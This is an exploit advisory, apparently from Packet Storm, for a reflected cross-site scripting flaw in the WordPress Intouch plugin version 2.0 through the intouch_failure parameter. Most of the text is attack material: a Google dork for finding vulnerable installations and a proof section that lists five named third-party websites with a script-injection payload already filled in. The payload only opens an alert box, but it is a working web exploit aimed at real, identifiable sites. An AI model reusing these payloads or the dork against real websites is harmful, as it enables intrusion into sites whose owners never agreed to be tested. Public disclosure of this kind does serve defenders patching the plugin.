WordPress Intouch plugin version 2.0 suffers from a cross site scripting vulnerability.
691581d85c2c063ace20d55779b4e836ddf81a0aeb863764af9c597a23bd1bd5######################
# Exploit Title : Wordpress intouch Cross Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/intouch/
# Google Dork : inurl:/wp-content/plugins/intouch/
# Date : 2013/01/01
# Tested on : Windows 8 , Linux
# Version : 2.0
# Software Link : http://downloads.wordpress.org/plugin/intouch.zip
######################
# Exploit : Cross Site Scripting
# Location :
http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS]
#
# Proof:
#
http://tresx4.net/esp/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.maltagop.net/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.sercongal.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.day-trading-mind.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.tauntoneasterrun.co.uk/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
######################
# discovered by : Spoof
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed